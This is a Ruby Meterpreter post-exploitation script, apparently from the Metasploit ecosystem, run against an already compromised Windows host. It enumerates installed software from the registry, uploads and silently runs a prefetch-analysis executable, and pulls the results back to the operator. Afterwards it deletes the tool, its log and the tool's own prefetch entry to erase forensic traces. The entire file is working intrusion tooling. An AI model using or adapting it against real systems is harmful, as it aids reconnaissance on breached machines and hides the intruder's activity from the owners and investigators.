milo

#!/usr/bin/env ruby
#Meterpreter script for extracting information from windows prefetch folder
#Provided by Milo at keith.lee2012[at]gmail.com
#Verion: 0.1.0
session = client
host,port = session.tunnel_peer.split(':')

# Script Options
@@exec_opts = Rex::Parser::Arguments.new(
        "-h" => [ false,  "Help menu."],
        "-p" => [ false,  "List Installed Programs"],
        "-c" => [ false,  "Disable SHA1/MD5 checksum"],
        "-x" => [ true,   "Top x Accessed Executables (Based on Prefetch folder)"],
        "-d" => [ false,  "Disable lookup for software name"],
        "-l" => [ false,  "Download Prefetch Folder Analysis Log"]
        )
tmp = session.fs.file.expand_path("%TEMP%")
imgname = sprintf("%.5d",rand(100000))
runTop = nil
logs = ''
logs1 = ''

timeoutsec = 1000
#---------------------------------------------------------------------------------------------------------
def readprogramlist(session)
    begin
    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', KEY_READ)
    sfmsvals = key.enum_key
    sfmsvals.each do |test1|
        begin
            key2 = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\"+test1
            root_key2, base_key2 = session.sys.registry.splitkey(key2)
            value1 = "DisplayName"
            value2 = "DisplayVersion"
            open_key = session.sys.registry.open_key(root_key2, base_key2, KEY_READ)
            v1 = open_key.query_value(value1)
            v2 = open_key.query_value(value2)
            print_status("#{v1.data}\t(Version:  #{v2.data})")
        rescue
        end
    end
    end
end

def prefetchdump(session,tmp,imgname,options,logs1,timeoutsec)
    tmpout = []
    prefetchexe = File.join(Msf::Config.install_root, "data", "prefetch.exe")
    prefetchlog = sprintf("%.5d",rand(100000))
    print_status("Uploading Prefetch-tool for analyzing Prefetch folder....")
    begin
        session.fs.file.upload_file("#{tmp}\\#{prefetchlog}.exe","#{prefetchexe}")
        print_status("Prefetch-tool uploaded as #{tmp}\\#{prefetchlog}.exe")
    rescue::Exception => e
            print_status("The following Error was encountered: #{e.class} #{e}")
    end
    session.response_timeout=timeoutsec
    if logs1!=''
        session = client
        host,port = session.tunnel_peer.split(':')
        logs = ::File.join(Msf::Config.config_directory, 'logs', 'prefetch', host + "-"+ ::Time.now.strftime("%Y%m%d.%M%S"))
        ::FileUtils.mkdir_p(logs)
        print "[*] Saving prefetch logs to #{tmp}\\#{imgname} "
    end

    begin
        r = session.sys.process.execute("cmd.exe /c #{tmp}\\#{prefetchlog}.exe #{options} #{logs1}.txt", nil, {'Hidden' => 'true','Channelized' => true})
        while(d = r.channel.read)
            print_status d
        end
        sleep(2)
        prog2check = "#{prefetchlog}.exe"
        found = 0
        while found == 0
            session.sys.process.get_processes().each do |x|
                found =1
                if prog2check == (x['name'].downcase)
                    print "."
                    sleep(0.5)
                    found = 0
                end
            end
        end
        r.channel.close
        r.close
        print "\n"
        if logs1!=""
            print_status("Finish extracting prefetch folder data")
        end
        print_status("Deleting #{prefetchlog}.exe from target...")
        session.sys.process.execute("cmd.exe /c del #{tmp}\\#{prefetchlog}.exe", nil, {'Hidden' => 'true'})
        session.sys.process.execute("cmd.exe /c del %windir%\\prefetch\\#{prefetchlog}*.pf", nil, {'Hidden' => 'true'})
        print_status("Clearing prefetch-tool prefetch entry ...")
    rescue::Exception => e
            print_status("The following error was encountered: #{e.class} #{e}")
    end
    return logs
end
#---------------------------------------------------------------------------------------------------------
def logdown(session,tmp,imgname,logs,timeoutsec)
    session.response_timeout=timeoutsec
    print_status("Downloading prefetch-tool logs to #{logs}")
    begin
        session.fs.file.download_file("#{logs}#{::File::Separator}#{imgname}.txt", "#{tmp}\\#{imgname}.txt")
        print_status("Finished downloading prefetch-tool log")
        print_status("Deleting left over files...")
        session.sys.process.execute("cmd.exe /c del #{tmp}\\#{imgname}", nil, {'Hidden' => 'true'})
        print_status("Prefetch-tool log on target deleted")
    rescue::Exception => e
            print_status("The following Error was encountered: #{e.class} #{e}")
    end
end

################## MAIN ##################
# Parsing of Option
checksum = 1
inetlookup = 1
hlp = 0
dwld = 0
options1 = ""
viewPrograms = 0

@@exec_opts.parse(args) { |opt, idx, val|
    case opt
    when "-x"
        options1 += " --x="+val
    when "-c"
        options1 += " --disable-md5 --disable-sha1"
    when "-p"
        viewPrograms = 1
        hlp = 1
    when "-d"
        options1 += " --disable-lookup"
    when "-l"
        logs1 = " --txt=#{tmp}\\#{imgname}"
        dwld = 1
    when "-h"
        hlp = 1
        print(
        "Prefetch-tool Meterpreter Script\n" +
        @@exec_opts.usage
        )
        break
    end
}
if (viewPrograms == 1)
    readprogramlist(session)
end

if (hlp == 0)
    print_status("Running Prefetch-tool Script.....")
    logs2 = prefetchdump(session,tmp,imgname,options1,logs1,timeoutsec)
    if (dwld == 1)
        logdown(session,tmp,imgname,logs2,timeoutsec)
    end
end